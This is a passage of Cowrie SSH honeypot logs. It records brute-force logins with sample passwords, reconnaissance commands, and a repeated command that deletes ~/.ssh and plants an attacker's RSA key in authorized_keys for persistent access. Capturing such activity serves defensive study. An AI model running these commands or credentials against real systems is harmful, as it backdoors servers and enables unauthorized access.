-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:15:10.926807Z","src_ip":"212.227.125.160","session":"8962f1acbd75"}
{"eventid":"cowrie.login.failed","username":"test4","password":"admin123","message":"login attempt [test4/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:15:12.743617Z","src_ip":"212.227.125.160","session":"8962f1acbd75"}
{"eventid":"cowrie.login.success","username":"root","password":"Vaca","message":"login attempt [root/Vaca] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:13.098747Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:14.228342Z","src_ip":"212.227.125.160","session":"8962f1acbd75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:16.005418Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T06:15:16.006088Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:17.474653Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:17.475869Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50194,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9a1c7015ba1","protocol":"ssh","message":"New connection: 212.227.125.160:50194 (1.2.3.4:22) [session: a9a1c7015ba1]","sensor":"my-vps","timestamp":"2025-08-31T06:15:19.030752Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"15.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 15.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:19.851129Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.session.closed","duration":"47.8","message":"Connection lost after 47.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:20.026062Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35616,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4aa7db3e12e","protocol":"ssh","message":"New connection: 201.148.180.50:35616 (1.2.3.4:22) [session: d4aa7db3e12e]","sensor":"my-vps","timestamp":"2025-08-31T06:15:23.347376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:15:24.276972Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:15:24.277684Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47406,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2ed6410e836","protocol":"ssh","message":"New connection: 212.227.235.229:47406 (1.2.3.4:22) [session: f2ed6410e836]","sensor":"my-vps","timestamp":"2025-08-31T06:15:28.278422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:28.279377Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:28.546623Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.login.success","username":"root","password":"ctrls.1234$#$","message":"login attempt [root/ctrls.1234$#$] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:29.653065Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.login.success","username":"root","password":"Vaca","message":"login attempt [root/Vaca] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:29.664178Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:30.210706Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:30.211535Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:30.212807Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:30.481112Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:31.082395Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.083479Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.353447Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.354545Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59644,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5eff3bbe26b","protocol":"ssh","message":"New connection: 212.227.235.229:59644 (1.2.3.4:22) [session: c5eff3bbe26b]","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.632825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.633795Z","src_ip":"212.227.235.229","session":"c5eff3bbe26b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:31.781051Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.781723Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:31.912724Z","src_ip":"212.227.235.229","session":"c5eff3bbe26b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:32.858061Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:32.859283Z","src_ip":"201.148.180.50","session":"d4aa7db3e12e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:15:33.070863Z","src_ip":"212.227.235.229","session":"c5eff3bbe26b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:34.352829Z","src_ip":"212.227.235.229","session":"c5eff3bbe26b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59646,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c9063d2857","protocol":"ssh","message":"New connection: 212.227.235.229:59646 (1.2.3.4:22) [session: f5c9063d2857]","sensor":"my-vps","timestamp":"2025-08-31T06:15:34.620870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:34.621679Z","src_ip":"212.227.235.229","session":"f5c9063d2857"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:34.890295Z","src_ip":"212.227.235.229","session":"f5c9063d2857"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:36.004316Z","src_ip":"212.227.235.229","session":"f5c9063d2857"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56908,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c0ccfd957c5","protocol":"ssh","message":"New connection: 212.227.235.229:56908 (1.2.3.4:22) [session: 7c0ccfd957c5]","sensor":"my-vps","timestamp":"2025-08-31T06:15:36.254563Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:36.272975Z","src_ip":"212.227.235.229","session":"f2ed6410e836"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:36.274824Z","src_ip":"212.227.235.229","session":"f5c9063d2857"}
{"eventid":"cowrie.session.closed","duration":"20.7","message":"Connection lost after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:39.693878Z","src_ip":"212.227.125.160","session":"a9a1c7015ba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51028,"dst_ip":"1.2.3.4","dst_port":22,"session":"a680d8a61383","protocol":"ssh","message":"New connection: 212.227.235.229:51028 (1.2.3.4:22) [session: a680d8a61383]","sensor":"my-vps","timestamp":"2025-08-31T06:15:47.836182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:15:48.970853Z","src_ip":"212.227.235.229","session":"a680d8a61383"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:15:48.971645Z","src_ip":"212.227.235.229","session":"a680d8a61383"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40384,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f1ea6d057a","protocol":"ssh","message":"New connection: 212.227.235.229:40384 (1.2.3.4:22) [session: a9f1ea6d057a]","sensor":"my-vps","timestamp":"2025-08-31T06:15:49.040651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:15:49.041617Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:15:49.337101Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.login.success","username":"root","password":"fang1314521","message":"login attempt [root/fang1314521] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:15:50.558733Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:51.164304Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:51.164976Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:15:51.165850Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:15:51.462693Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:52.108050Z","src_ip":"212.227.235.229","session":"a9f1ea6d057a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 